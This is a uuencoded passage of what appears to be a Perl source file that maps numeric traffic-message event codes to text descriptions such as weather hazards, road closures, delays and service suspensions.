+M96YT6S$S,#E=(#T@(G-M;VME(&AA>F%R9"`H=FES:6)I;&ET>2!R961U8V5D
+M('1O(%$I(CL*("`@("1%=F5N=%LQ,S$P72`](")B;&]W:6YG(&1U<W0@*'9I
+M<VEB:6QI='D@<F5D=6-E9"!T;R!1*2(["B`@("`D179E;G1;,3,Q,ET@/2`B
+M<VYO=V9A;&P@86YD(&9O9R`H=FES:6)I;&ET>2!R961U8V5D('1O(%$I(CL*
+M("`@("1%=F5N=%LQ,S$S72`](")V:7-I8FEL:71Y(&EM<')O=F5D(CL*("`@
+M("1%=F5N=%LQ,S$T72`](")M97-S86=E(&-A;F-E;&QE9"(["B`@("`D179E
+M;G1;,3,Q.%T@/2`B=FES:6)I;&ET>2!R961U8V5D("AT;R!1*2(["B`@("`D
+M179E;G1;,3,Q.5T@/2`B=FES:6)I;&ET>2!R961U8V5D('1O(#QM(CL*("`@
+M("1%=F5N=%LQ,S(P72`](")V:7-I8FEL:71Y(')E9'5C960@=&\@/&TB.PH@
+M("`@)$5V96YT6S$S,C%=(#T@(G9I<VEB:6QI='D@<F5D=6-E9"!T;R`\;2([
+M"B`@("`D179E;G1;,3,R,ET@/2`B=VAI=&4@;W5T("AV:7-I8FEL:71Y(')E
+M9'5C960@=&\@42DB.PH@("`@)$5V96YT6S$S,C-=(#T@(F)L;W=I;F<@<VYO
+M=R`H=FES:6)I;&ET>2!R961U8V5D('1O(%$I(CL*("`@("1%=F5N=%LQ,S(T
+M72`](")S<')A>2!H87IA<F0@*'9I<VEB:6QI='D@<F5D=6-E9"!T;R!1*2([
+M"B`@("`D179E;G1;,3,R-5T@/2`B;&]W('-U;B!G;&%R92(["B`@("`D179E
+M;G1;,3,R-ET@/2`B<V%N9'-T;W)M<R`H=FES:6)I;&ET>2!R961U8V5D('1O
+M(%$I(CL*("`@("1%=F5N=%LQ,S,R72`](")S;6]G(&%L97)T(CL*("`@("1%
+M=F5N=%LQ,S,W72`](")F<F5E>FEN9R!F;V<@*'9I<VEB:6QI='D@<F5D=6-E
+M9"!T;R!1*2X@4VQI<'!E<GD@<F]A9',B.PH@("`@)$5V96YT6S$S,SA=(#T@
+M(FYO(&UO=&]R('9E:&EC;&5S(&1U92!T;R!S;6]G(&%L97)T(CL*("`@("1%
+M=F5N=%LQ,S0P72`](")S=V%R;7,@;V8@:6YS96-T<R`H=FES:6)I;&ET>2!R
+M961U8V5D('1O(%$I(CL*("`@("1%=F5N=%LQ,S0U72`](")F;V<@8VQE87)I
+M;F<B.PH@("`@)$5V96YT6S$S-#9=(#T@(F9O9R!F;W)E8V%S="!W:71H9')A
+M=VXB.PH@("`@)$5V96YT6S$T-3!=(#T@(FEN=&5R;F%T:6]N86P@<W!O<G1S
+M(&UE971I;F<B.PH@("`@)$5V96YT6S$T-3%=(#T@(FUA=&-H(CL*("`@("1%
+M=F5N=%LQ-#4R72`](")T;W5R;F%M96YT(CL*("`@("1%=F5N=%LQ-#4S72`]
+M(")A=&AL971I8W,@;65E=&EN9R(["B`@("`D179E;G1;,30U-%T@/2`B8F%L
+M;"!G86UE(CL*("`@("1%=F5N=%LQ-#4U72`](")B;WAI;F<@=&]U<FYA;65N
+M="(["B`@("`D179E;G1;,30U-ET@/2`B8G5L;"!F:6=H="(["B`@("`D179E
+M;G1;,30U-UT@/2`B8W)I8VME="!M871C:"(["B`@("`D179E;G1;,30U.%T@
+M/2`B8WEC;&4@<F%C92(["B`@("`D179E;G1;,30U.5T@/2`B9F]O=&)A;&P@
+M;6%T8V@B.PH@("`@)$5V96YT6S$T-C!=(#T@(F=O;&8@=&]U<FYA;65N="([
+M"B`@("`D179E;G1;,30V,5T@/2`B;6%R871H;VXB.PH@("`@)$5V96YT6S$T
+M-C)=(#T@(G)A8V4@;65E=&EN9R(["B`@("`D179E;G1;,30V,UT@/2`B<G5G
+M8GD@;6%T8V@B.PH@("`@)$5V96YT6S$T-C1=(#T@(G-H;W<@:G5M<&EN9R([
+M"B`@("`D179E;G1;,30V-5T@/2`B=&5N;FES('1O=7)N86UE;G0B.PH@("`@
+M)$5V96YT6S$T-C9=(#T@(G=A=&5R('-P;W)T<R!M965T:6YG(CL*("`@("1%
+M=F5N=%LQ-#8W72`](")W:6YT97(@<W!O<G1S(&UE971I;F<B.PH@("`@)$5V
+M96YT6S$T-CA=(#T@(F9U;F9A:7(B.PH@("`@)$5V96YT6S$T-CE=(#T@(G1R
+M861E(&9A:7(B.PH@("`@)$5V96YT6S$T-S!=(#T@(G!R;V-E<W-I;VXB.PH@
+M("`@)$5V96YT6S$T-S%=(#T@(G-I9VAT<V5E<G,@;V)S=')U8W1I;F<@86-C
+M97-S(CL*("`@("1%=F5N=%LQ-#<R72`](")P96]P;&4@;VX@<F]A9'=A>2([
+M"B`@("`D179E;G1;,30W,UT@/2`B8VAI;&1R96X@;VX@<F]A9'=A>2(["B`@
+M("`D179E;G1;,30W-%T@/2`B8WEC;&ES=',@;VX@<F]A9'=A>2(["B`@("`D
+M179E;G1;,30W-5T@/2`B<W1R:6ME(CL*("`@("1%=F5N=%LQ-#<V72`](")S
+M96-U<FET>2!I;F-I9&5N="(["B`@("`D179E;G1;,30W-UT@/2`B<&]L:6-E
+M(&-H96-K<&]I;G0B.PH@("`@)$5V96YT6S$T-SA=(#T@(G1E<G)O<FES="!I
+M;F-I9&5N="(["B`@("`D179E;G1;,30W.5T@/2`B9W5N9FER92!O;B!R;V%D
+M=V%Y+"!D86YG97(B.PH@("`@)$5V96YT6S$T.#!=(#T@(F-I=FEL(&5M97)G
+M96YC>2(["B`@("`D179E;G1;,30X,5T@/2`B86ER(')A:60L(&1A;F=E<B([
+M"B`@("`D179E;G1;,30X,ET@/2`B<&5O<&QE(&]N(')O861W87DN($1A;F=E
+M<B(["B`@("`D179E;G1;,30X,UT@/2`B8VAI;&1R96X@;VX@<F]A9'=A>2X@
+M1&%N9V5R(CL*("`@("1%=F5N=%LQ-#@T72`](")C>6-L:7-T<R!O;B!R;V%D
+M=V%Y+B!$86YG97(B.PH@("`@)$5V96YT6S$T.#5=(#T@(F-L;W-E9"!D=64@
+M=&\@<V5C=7)I='D@:6YC:61E;G0B.PH@("`@)$5V96YT6S$T.#9=(#T@(G-E
+M8W5R:71Y(&EN8VED96YT+B!$96QA>7,@*%$I(CL*("`@("1%=F5N=%LQ-#@W
+M72`](")S96-U<FET>2!I;F-I9&5N="X@1&5L87ES("A1*2!E>'!E8W1E9"([
+M"B`@("`D179E;G1;,30X.%T@/2`B<V5C=7)I='D@:6YC:61E;G0N($QO;F<@
+M9&5L87ES("A1*2(["B`@("`D179E;G1;,30X.5T@/2`B<&]L:6-E(&-H96-K
+M<&]I;G0N($1E;&%Y<R`H42DB.PH@("`@)$5V96YT6S$T.3!=(#T@(G!O;&EC
+M92!C:&5C:W!O:6YT+B!$96QA>7,@*%$I(&5X<&5C=&5D(CL*("`@("1%=F5N
+M=%LQ-#DQ72`](")P;VQI8V4@8VAE8VMP;VEN="X@3&]N9R!D96QA>7,@*%$I
+M(CL*("`@("1%=F5N=%LQ-#DR72`](")S96-U<FET>2!A;&5R="!W:71H9')A
+M=VXB.PH@("`@)$5V96YT6S$T.3-=(#T@(G-P;W)T<R!T<F%F9FEC(&-L96%R
+M960B.PH@("`@)$5V96YT6S$T.31=(#T@(F5V86-U871I;VXB.PH@("`@)$5V
+M96YT6S$T.35=(#T@(F5V86-U871I;VXN($AE879Y('1R869F:6,B.PH@("`@
+M)$5V96YT6S$T.39=(#T@(G1R869F:6,@9&ES<G5P=&EO;B!C;&5A<F5D(CL*
+M("`@("1%=F5N=%LQ-3`Q72`](")M86IO<B!E=F5N="(["B`@("`D179E;G1;
+M,34P,ET@/2`B<W!O<G1S(&5V96YT(&UE971I;F<B.PH@("`@)$5V96YT6S$U
+M,#-=(#T@(G-H;W<B.PH@("`@)$5V96YT6S$U,#1=(#T@(F9E<W1I=F%L(CL*
+M("`@("1%=F5N=%LQ-3`U72`](")E>&AI8FET:6]N(CL*("`@("1%=F5N=%LQ
+M-3`V72`](")F86ER(CL*("`@("1%=F5N=%LQ-3`W72`](")M87)K970B.PH@
+M("`@)$5V96YT6S$U,#A=(#T@(F-E<F5M;VYI86P@979E;G0B.PH@("`@)$5V
+M96YT6S$U,#E=(#T@(G-T871E(&]C8V%S:6]N(CL*("`@("1%=F5N=%LQ-3$P
+M72`](")P87)A9&4B.PH@("`@)$5V96YT6S$U,3%=(#T@(F-R;W=D(CL*("`@
+M("1%=F5N=%LQ-3$R72`](")M87)C:"(["B`@("`D179E;G1;,34Q,UT@/2`B
+M9&5M;VYS=')A=&EO;B(["B`@("`D179E;G1;,34Q-%T@/2`B<'5B;&EC(&1I
+M<W1U<F)A;F-E(CL*("`@("1%=F5N=%LQ-3$U72`](")S96-U<FET>2!A;&5R
+M="(["B`@("`D179E;G1;,34Q-ET@/2`B8F]M8B!A;&5R="(["B`@("`D179E
+M;G1;,34Q-UT@/2`B;6%J;W(@979E;G0N(%-T871I;VYA<GD@=')A9F9I8R([
+M"B`@("`D179E;G1;,34Q.%T@/2`B;6%J;W(@979E;G0N($1A;F=E<B!O9B!S
+M=&%T:6]N87)Y('1R869F:6,B.PH@("`@)$5V96YT6S$U,3E=(#T@(FUA:F]R
+M(&5V96YT+B!1=65U:6YG('1R869F:6,B.PH@("`@)$5V96YT6S$U,C!=(#T@
+M(FUA:F]R(&5V96YT+B!$86YG97(@;V8@<75E=6EN9R!T<F%F9FEC(CL*("`@
+M("1%=F5N=%LQ-3(Q72`](")M86IO<B!E=F5N="X@4VQO=R!T<F%F9FEC(CL*
+M("`@("1%=F5N=%LQ-3(R72`](")M86IO<B!E=F5N="X@4VQO=R!T<F%F9FEC
+M(&5X<&5C=&5D(CL*("`@("1%=F5N=%LQ-3(S72`](")M86IO<B!E=F5N="X@
+M2&5A=GD@=')A9F9I8R(["B`@("`D179E;G1;,34R-%T@/2`B;6%J;W(@979E
+M;G0N($AE879Y('1R869F:6,@97AP96-T960B.PH@("`@)$5V96YT6S$U,C5=
+M(#T@(FUA:F]R(&5V96YT+B!4<F%F9FEC(&9L;W=I;F<@9G)E96QY(CL*("`@
+M("1%=F5N=%LQ-3(V72`](")M86IO<B!E=F5N="X@5')A9F9I8R!B=6EL9&EN
+M9R!U<"(["B`@("`D179E;G1;,34R-UT@/2`B8VQO<V5D(&1U92!T;R!M86IO
+M<B!E=F5N="(["B`@("`D179E;G1;,34R.%T@/2`B;6%J;W(@979E;G0N($1E
+M;&%Y<R`H42DB.PH@("`@)$5V96YT6S$U,CE=(#T@(FUA:F]R(&5V96YT+B!$
+M96QA>7,@*%$I(&5X<&5C=&5D(CL*("`@("1%=F5N=%LQ-3,P72`](")M86IO
+M<B!E=F5N="X@3&]N9R!D96QA>7,@*%$I(CL*("`@("1%=F5N=%LQ-3,Q72`]
+M(")S<&]R=',@;65E=&EN9RX@4W1A=&EO;F%R>2!T<F%F9FEC(CL*("`@("1%
+M=F5N=%LQ-3,R72`](")S<&]R=',@;65E=&EN9RX@1&%N9V5R(&]F('-T871I
+M;VYA<GD@=')A9F9I8R(["B`@("`D179E;G1;,34S,UT@/2`B<W!O<G1S(&UE
+M971I;F<N(%%U975I;F<@=')A9F9I8R(["B`@("`D179E;G1;,34S-%T@/2`B
+M<W!O<G1S(&UE971I;F<N($1A;F=E<B!O9B!Q=65U:6YG('1R869F:6,B.PH@
+M("`@)$5V96YT6S$U,S5=(#T@(G-P;W)T<R!M965T:6YG+B!3;&]W('1R869F
+M:6,B.PH@("`@)$5V96YT6S$U,S9=(#T@(G-P;W)T<R!M965T:6YG+B!3;&]W
+M('1R869F:6,@97AP96-T960B.PH@("`@)$5V96YT6S$U,S==(#T@(G-P;W)T
+M<R!M965T:6YG+B!(96%V>2!T<F%F9FEC(CL*("`@("1%=F5N=%LQ-3,X72`]
+M(")S<&]R=',@;65E=&EN9RX@2&5A=GD@=')A9F9I8R!E>'!E8W1E9"(["B`@
+M("`D179E;G1;,34S.5T@/2`B<W!O<G1S(&UE971I;F<N(%1R869F:6,@9FQO
+M=VEN9R!F<F5E;'DB.PH@("`@)$5V96YT6S$U-#!=(#T@(G-P;W)T<R!M965T
+M:6YG+B!4<F%F9FEC(&)U:6QD:6YG('5P(CL*("`@("1%=F5N=%LQ-30Q72`]
+M(")C;&]S960@9'5E('1O('-P;W)T<R!M965T:6YG(CL*("`@("1%=F5N=%LQ
+M-30R72`](")S<&]R=',@;65E=&EN9RX@1&5L87ES("A1*2(["B`@("`D179E
+M;G1;,34T,UT@/2`B<W!O<G1S(&UE971I;F<N($1E;&%Y<R`H42D@97AP96-T
+M960B.PH@("`@)$5V96YT6S$U-#1=(#T@(G-P;W)T<R!M965T:6YG+B!,;VYG
+M(&1E;&%Y<R`H42DB.PH@("`@)$5V96YT6S$U-#5=(#T@(F9A:7(N(%-T871I
+M;VYA<GD@=')A9F9I8R(["B`@("`D179E;G1;,34T-ET@/2`B9F%I<BX@1&%N
+M9V5R(&]F('-T871I;VYA<GD@=')A9F9I8R(["B`@("`D179E;G1;,34T-UT@
+M/2`B9F%I<BX@475E=6EN9R!T<F%F9FEC(CL*("`@("1%=F5N=%LQ-30X72`]
+M(")F86ER+B!$86YG97(@;V8@<75E=6EN9R!T<F%F9FEC(CL*("`@("1%=F5N
+M=%LQ-30Y72`](")F86ER+B!3;&]W('1R869F:6,B.PH@("`@)$5V96YT6S$U
+M-3!=(#T@(F9A:7(N(%-L;W<@=')A9F9I8R!E>'!E8W1E9"(["B`@("`D179E
+M;G1;,34U,5T@/2`B9F%I<BX@2&5A=GD@=')A9F9I8R(["B`@("`D179E;G1;
+M,34U,ET@/2`B9F%I<BX@2&5A=GD@=')A9F9I8R!E>'!E8W1E9"(["B`@("`D
+M179E;G1;,34U,UT@/2`B9F%I<BX@5')A9F9I8R!F;&]W:6YG(&9R965L>2([
+M"B`@("`D179E;G1;,34U-%T@/2`B9F%I<BX@5')A9F9I8R!B=6EL9&EN9R!U
+M<"(["B`@("`D179E;G1;,34U-5T@/2`B8VQO<V5D(&1U92!T;R!F86ER(CL*
+M("`@("1%=F5N=%LQ-34V72`](")F86ER+B!$96QA>7,@*%$I(CL*("`@("1%
+M=F5N=%LQ-34W72`](")F86ER+B!$96QA>7,@*%$I(&5X<&5C=&5D(CL*("`@
+M("1%=F5N=%LQ-34X72`](")F86ER+B!,;VYG(&1E;&%Y<R`H42DB.PH@("`@
+M)$5V96YT6S$U-3E=(#T@(F-L;W-E9"!D=64@=&\@<&%R861E(CL*("`@("1%
+M=F5N=%LQ-38P72`](")P87)A9&4N($1E;&%Y<R`H42DB.PH@("`@)$5V96YT
+M6S$U-C%=(#T@(G!A<F%D92X@1&5L87ES("A1*2!E>'!E8W1E9"(["B`@("`D
+M179E;G1;,34V,ET@/2`B<&%R861E+B!,;VYG(&1E;&%Y<R`H42DB.PH@("`@
+M)$5V96YT6S$U-C-=(#T@(F-L;W-E9"!D=64@=&\@<W1R:6ME(CL*("`@("1%
+M=F5N=%LQ-38T72`](")S=')I:V4N($1E;&%Y<R`H42DB.PH@("`@)$5V96YT
+M6S$U-C5=(#T@(G-T<FEK92X@1&5L87ES("A1*2!E>'!E8W1E9"(["B`@("`D
+M179E;G1;,34V-ET@/2`B<W1R:6ME+B!,;VYG(&1E;&%Y<R`H42DB.PH@("`@
+M)$5V96YT6S$U-C==(#T@(F-L;W-E9"!D=64@=&\@9&5M;VYS=')A=&EO;B([
+M"B`@("`D179E;G1;,34V.%T@/2`B9&5M;VYS=')A=&EO;BX@1&5L87ES("A1
+M*2(["B`@("`D179E;G1;,34V.5T@/2`B9&5M;VYS=')A=&EO;BX@1&5L87ES
+M("A1*2!E>'!E8W1E9"(["B`@("`D179E;G1;,34W,%T@/2`B9&5M;VYS=')A
+M=&EO;BX@3&]N9R!D96QA>7,@*%$I(CL*("`@("1%=F5N=%LQ-3<Q72`](")S
+M96-U<FET>2!A;&5R="X@4W1A=&EO;F%R>2!T<F%F9FEC(CL*("`@("1%=F5N
+M=%LQ-3<R72`](")S96-U<FET>2!A;&5R="X@1&%N9V5R(&]F('-T871I;VYA
+M<GD@=')A9F9I8R(["B`@("`D179E;G1;,34W,UT@/2`B<V5C=7)I='D@86QE
+M<G0N(%%U975I;F<@=')A9F9I8R(["B`@("`D179E;G1;,34W-%T@/2`B<V5C
+M=7)I='D@86QE<G0N($1A;F=E<B!O9B!Q=65U:6YG('1R869F:6,B.PH@("`@
+M)$5V96YT6S$U-S5=(#T@(G-E8W5R:71Y(&%L97)T+B!3;&]W('1R869F:6,B
+M.PH@("`@)$5V96YT6S$U-S9=(#T@(G-E8W5R:71Y(&%L97)T+B!3;&]W('1R
+M869F:6,@97AP96-T960B.PH@("`@)$5V96YT6S$U-S==(#T@(G-E8W5R:71Y
+M(&%L97)T+B!(96%V>2!T<F%F9FEC(CL*("`@("1%=F5N=%LQ-3<X72`](")S
+M96-U<FET>2!A;&5R="X@2&5A=GD@=')A9F9I8R!E>'!E8W1E9"(["B`@("`D
+M179E;G1;,34W.5T@/2`B<V5C=7)I='D@86QE<G0N(%1R869F:6,@8G5I;&1I
+M;F<@=7`B.PH@("`@)$5V96YT6S$U.#!=(#T@(F-L;W-E9"!D=64@=&\@<V5C
+M=7)I='D@86QE<G0B.PH@("`@)$5V96YT6S$U.#%=(#T@(G-E8W5R:71Y(&%L
+M97)T+B!$96QA>7,@*%$I(CL*("`@("1%=F5N=%LQ-3@R72`](")S96-U<FET
+M>2!A;&5R="X@1&5L87ES("A1*2!E>'!E8W1E9"(["B`@("`D179E;G1;,34X
+M,UT@/2`B<V5C=7)I='D@86QE<G0N($QO;F<@9&5L87ES("A1*2(["B`@("`D
+M179E;G1;,34X-%T@/2`B=')A9F9I8R!H87,@<F5T=7)N960@=&\@;F]R;6%L
+M(CL*("`@("1%=F5N=%LQ-3@U72`](")M97-S86=E(&-A;F-E;&QE9"(["B`@
+M("`D179E;G1;,34X-ET@/2`B<V5C=7)I='D@86QE<G0N(%1R869F:6,@9FQO
+M=VEN9R!F<F5E;'DB.PH@("`@)$5V96YT6S$U.#==(#T@(F%I<B!R86ED('=A
+M<FYI;F<@8V%N8V5L;&5D(CL*("`@("1%=F5N=%LQ-3@X72`](")C:79I;"!E
+M;65R9V5N8WD@8V%N8V5L;&5D(CL*("`@("1%=F5N=%LQ-3@Y72`](")M97-S
+M86=E(&-A;F-E;&QE9"(["B`@("`D179E;G1;,34Y,%T@/2`B<V5V97)A;"!M
+M86IO<B!E=F5N=',B.PH@("`@)$5V96YT6S$U.3%=(#T@(FEN9F]R;6%T:6]N
+M(&%B;W5T(&UA:F]R(&5V96YT(&YO(&QO;F=E<B!V86QI9"(["B`@("`D179E
+M;G1;,38P,5T@/2`B9&5L87ES("A1*2(["B`@("`D179E;G1;,38P,ET@/2`B
+M9&5L87ES('5P('1O(&UI;G5T97,B.PH@("`@)$5V96YT6S$V,#-=(#T@(F1E
+M;&%Y<R!U<"!T;R!M:6YU=&5S(CL*("`@("1%=F5N=%LQ-C`T72`](")D96QA
+M>7,@=7`@=&\@;VYE(&AO=7(B.PH@("`@)$5V96YT6S$V,#5=(#T@(F1E;&%Y
+M<R!U<"!T;R!T=V\@:&]U<G,B.PH@("`@)$5V96YT6S$V,#9=(#T@(F1E;&%Y
+M<R!O9B!S979E<F%L(&AO=7)S(CL*("`@("1%=F5N=%LQ-C`W72`](")D96QA
+M>7,@*%$I(&5X<&5C=&5D(CL*("`@("1%=F5N=%LQ-C`X72`](")L;VYG(&1E
+M;&%Y<R`H42DB.PH@("`@)$5V96YT6S$V,#E=(#T@(F1E;&%Y<R`H42D@9F]R
+M(&AE879Y('9E:&EC;&5S(CL*("`@("1%=F5N=%LQ-C$P72`](")D96QA>7,@
+M=7`@=&\@;6EN=71E<R!F;W(@:&5A=GD@;&]R<BAY+VEE<RDB.PH@("`@)$5V
+M96YT6S$V,3%=(#T@(F1E;&%Y<R!U<"!T;R!M:6YU=&5S(&9O<B!H96%V>2!L
+M;W)R*'DO:65S*2(["B`@("`D179E;G1;,38Q,ET@/2`B9&5L87ES('5P('1O
+M(&]N92!H;W5R(&9O<B!H96%V>2!L;W)R*'DO:65S*2(["B`@("`D179E;G1;
+M,38Q,UT@/2`B9&5L87ES('5P('1O('1W;R!H;W5R<R!F;W(@:&5A=GD@;&]R
+M<BAY+VEE<RDB.PH@("`@)$5V96YT6S$V,31=(#T@(F1E;&%Y<R!O9B!S979E
+M<F%L(&AO=7)S(&9O<B!H96%V>2!L;W)R*'DO:65S*2(["B`@("`D179E;G1;
+M,38Q-5T@/2`B<V5R=FEC92!S=7-P96YD960@*'5N=&EL(%$I(CL*("`@("1%
+M=F5N=%LQ-C$V72`]("(H42D@<V5R=FEC92!W:71H9')A=VXB.PH@("`@)$5V
+M96YT6S$V,3==(#T@(BA1*2!S97)V:6-E*',I(&9U;&QY(&)O;VME9"(["B`@
+M("`D179E;G1;,38Q.%T@/2`B*%$I('-E<G9I8V4H<RD@9G5L;'D@8F]O:V5D
+M(&9O<B!H96%V>2!V96AI8VQE<R(["B`@("`D179E;G1;,38Q.5T@/2`B;F]R
+M;6%L('-E<G9I8V5S(')E<W5M960B.PH@("`@)$5V96YT6S$V,C!=(#T@(FUE
+M<W-A9V4@8V%N8V5L;&5D(CL*("`@("1%=F5N=%LQ-C(Q72`](")D96QA>7,@
+M=7`@=&\@;6EN=71E<R(["B`@("`D179E;G1;,38R,ET@/2`B9&5L87ES('5P
+M('1O(&UI;G5T97,B.PH@("`@)$5V96YT6S$V,C-=(#T@(F1E;&%Y<R!U<"!T
+M;R!M:6YU=&5S(CL*("`@("1%=F5N=%LQ-C(T72`](")D96QA>7,@=7`@=&\@
+M;6EN=71E<R(["B`@("`D179E;G1;,38R-5T@/2`B9&5L87ES('5P('1O(&UI
+M;G5T97,B.PH@("`@)$5V96YT6S$V,C9=(#T@(F1E;&%Y<R!U<"!T;R!M:6YU
+M=&5S(CL*("`@("1%=F5N=%LQ-C(W72`](")D96QA>7,@=7`@=&\@;6EN=71E
+M<R(["B`@("`D179E;G1;,38R.%T@/2`B9&5L87ES('5P('1O('1H<F5E(&AO
+M=7)S(CL*("`@("1%=F5N=%LQ-C(Y72`](")D96QA>7,@=7`@=&\@9F]U<B!H
+M;W5R<R(["B`@("`D179E;G1;,38S,%T@/2`B9&5L87ES('5P('1O(&9I=F4@
+M:&]U<G,B.PH@("`@)$5V96YT6S$V,S%=(#T@(G9E<GD@;&]N9R!D96QA>7,@
+M*%$I(CL*("`@("1%=F5N=%LQ-C,R72`](")D96QA>7,@;V8@=6YC97)T86EN
+M(&1U<F%T:6]N(CL*("`@("1%=F5N=%LQ-C,S72`](")D96QA>65D('5N=&EL
+M(&9U<G1H97(@;F]T:6-E(CL*("`@("1%=F5N=%LQ-C,T72`](")C86YC96QL
+M871I;VYS(CL*("`@("1%=F5N=%LQ-C,U72`](")P87)K(&%N9"!R:61E('-E
+M<G9I8V4@;F]T(&]P97)A=&EN9R`H=6YT:6P@42DB.PH@("`@)$5V96YT6S$V
+M,S9=(#T@(G-P96-I86P@<'5B;&EC('1R86YS<&]R="!S97)V:6-E<R!O<&5R
+M871I;F<@*'5N=&EL(%$I(CL*("`@("1%=F5N=%LQ-C,W72`](")N;W)M86P@
+M<V5R=FEC97,@;F]T(&]P97)A=&EN9R`H=6YT:6P@42DB.PH@("`@)$5V96YT
+M6S$V,SA=(#T@(G)A:6P@<V5R=FEC97,@;F]T(&]P97)A=&EN9R`H=6YT:6P@
+M42DB.PH@("`@)$5V96YT6S$V,SE=(#T@(F)U<R!S97)V:6-E<R!N;W0@;W!E
+M<F%T:6YG("AU;G1I;"!1*2(["B`@("`D179E;G1;,38T,%T@/2`B<VAU='1L
+M92!S97)V:6-E(&]P97)A=&EN9R`H=6YT:6P@42DB.PH@("`@)$5V96YT6S$V
+M-#%=(#T@(F9R964@<VAU='1L92!S97)V:6-E(&]P97)A=&EN9R`H=6YT:6P@
+M42DB.PH@("`@)$5V96YT6S$V-#)=(#T@(F1E;&%Y<R`H42D@9F]R(&AE879Y
+M(&QO<G(H>2]I97,I(CL*("`@("1%=F5N=%LQ-C0S72`](")D96QA>7,@*%$I
+M(&9O<B!B=7-E<R(["B`@("`D179E;G1;,38T-%T@/2`B*%$I('-E<G9I8V4H
+M<RD@9G5L;'D@8F]O:V5D(&9O<B!H96%V>2!L;W)R*'DO:65S*2(["B`@("`D
+M179E;G1;,38T-5T@/2`B*%$I('-E<G9I8V4H<RD@9G5L;'D@8F]O:V5D(&9O
+M<B!B=7-E<R(["B`@("`D179E;G1;,38T-ET@/2`B;F5X="!D97!A<G1U<F4@
+M*%$I(&9O<B!H96%V>2!L;W)R*'DO:65S*2(["B`@("`D179E;G1;,38T-UT@
+M/2`B;F5X="!D97!A<G1U<F4@*%$I(&9O<B!B=7-E<R(["B`@("`D179E;G1;
+M,38T.%T@/2`B9&5L87ES(&-L96%R960B.PH@("`@)$5V96YT6S$V-#E=(#T@
+M(G)A<&ED('1R86YS:70@<V5R=FEC92!N;W0@;W!E<F%T:6YG("AU;G1I;"!1
+M*2(["B`@("`D179E;G1;,38U,%T@/2`B9&5L87ES("A1*2!P;W-S:6)L92([
+M"B`@("`D179E;G1;,38U,5T@/2`B=6YD97)G<F]U;F0@<V5R=FEC92!N;W0@
+M;W!E<F%T:6YG("AU;G1I;"!1*2(["B`@("`D179E;G1;,38U,ET@/2`B8V%N
+M8V5L;&%T:6]N<R!E>'!E8W1E9"(["B`@("`D179E;G1;,38U,UT@/2`B;&]N
+M9R!D96QA>7,@97AP96-T960B.PH@("`@)$5V96YT6S$V-31=(#T@(G9E<GD@
+M;&]N9R!D96QA>7,@97AP96-T960B.PH@("`@)$5V96YT6S$V-35=(#T@(F%L
+M;"!S97)V:6-E<R!F=6QL>2!B;V]K960@*'5N=&EL(%$I(CL*("`@("1%=F5N
+M=%LQ-C4V72`](")N97AT(&%R<FEV86P@*%$I(CL*("`@("1%=F5N=%LQ-C4W
+M72`](")R86EL('-E<G9I8V5S(&ER<F5G=6QA<BX@1&5L87ES("A1*2(["B`@
+M("`D179E;G1;,38U.%T@/2`B8G5S('-E<G9I8V5S(&ER<F5G=6QA<BX@1&5L
+M87ES("A1*2(["B`@("`D179E;G1;,38U.5T@/2`B=6YD97)G<F]U;F0@<V5R
+M=FEC97,@:7)R96=U;&%R(CL*("`@("1%=F5N=%LQ-C8P72`](")N;W)M86P@
+M<'5B;&EC('1R86YS<&]R="!S97)V:6-E<R!R97-U;65D(CL*("`@("1%=F5N
+M=%LQ-C8Q72`](")F97)R>2!S97)V:6-E(&YO="!O<&5R871I;F<@*'5N=&EL
+M(%$I(CL*("`@("1%=F5N=%LQ-C8R72`](")P87)K(&%N9"!R:61E('1R:7`@
+M=&EM92`H42DB.PH@("`@)$5V96YT6S$V-C-=(#T@(F1E;&%Y(&5X<&5C=&5D
+M('1O(&)E(&-L96%R960B.PH@("`@)$5V96YT6S$V.35=(#T@(F-U<G)E;G0@
+M=')I<"!T:6UE("A1*2(["B`@("`D179E;G1;,38Y-ET@/2`B97AP96-T960@
+M=')I<"!T:6UE("A1*2(["B`@("`D179E;G1;,3<P,%T@/2`B*%$I('-L;W<@
+M;6]V:6YG(&UA:6YT96YA;F-E('9E:&EC;&4H<RDB.PH@("`@)$5V96YT6S$W
+M,#%=(#T@(BA1*2!V96AI8VQE*',I(&]N('=R;VYG(&-A<G)I86=E=V%Y(CL*
+M("`@("1%=F5N=%LQ-S`R72`](")D86YG97)O=7,@=F5H:6-L92!W87)N:6YG
+M(&-L96%R960B.PH@("`@)$5V96YT6S$W,#-=(#T@(FUE<W-A9V4@8V%N8V5L
+M;&5D(CL*("`@("1%=F5N=%LQ-S`T72`]("(H42D@<F5C:VQE<W,@9')I=F5R
+M*',I(CL*("`@("1%=F5N=%LQ-S`U72`]("(H42D@<')O:&EB:71E9"!V96AI
+M8VQE*',I(&]N('1H92!R;V%D=V%Y(CL*("`@("1%=F5N=%LQ-S`V72`]("(H
+M42D@96UE<F=E;F-Y('9E:&EC;&5S(CL*("`@("1%=F5N=%LQ-S`W72`]("(H
+M42D@:&EG:"US<&5E9"!E;65R9V5N8WD@=F5H:6-L97,B.PH@("`@)$5V96YT
+M6S$W,#A=(#T@(FAI9V@M<W!E960@8VAA<V4@*&EN=F]L=FEN9R!1('9E:&EC
+M;&5S*2(["B`@("`D179E;G1;,3<P.5T@/2`B<W!I;&QA9V4@;V-C=7)R:6YG
+M(&9R;VT@;6]V:6YG('9E:&EC;&4B.PH@("`@)$5V96YT6S$W,3!=(#T@(F]B
+M:F5C=',@9F%L;&EN9R!F<F]M(&UO=FEN9R!V96AI8VQE(CL*("`@("1%=F5N
+M=%LQ-S$Q72`](")E;65R9V5N8WD@=F5H:6-L92!W87)N:6YG(&-L96%R960B
+M.PH@("`@)$5V96YT6S$W,3)=(#T@(G)O860@8VQE87)E9"(["B`@("`D179E
+M;G1;,3<R,%T@/2`B<F%I;"!S97)V:6-E<R!I<G)E9W5L87(B.PH@("`@)$5V
+M96YT6S$W,C%=(#T@(G!U8FQI8R!T<F%N<W!O<G0@<V5R=FEC97,@;F]T(&]P
+M97)A=&EN9R(["B`@("`D179E;G1;,3<S,5T@/2`B*%$I(&%B;F]R;6%L(&QO
+M860H<RDL(&1A;F=E<B(["B`@("`D179E;G1;,3<S,ET@/2`B*%$I('=I9&4@
+M;&]A9"AS*2P@9&%N9V5R(CL*("`@("1%=F5N=%LQ-S,S72`]("(H42D@;&]N
+M9R!L;V%D*',I+"!D86YG97(B.PH@("`@)$5V96YT6S$W,S1=(#T@(BA1*2!S
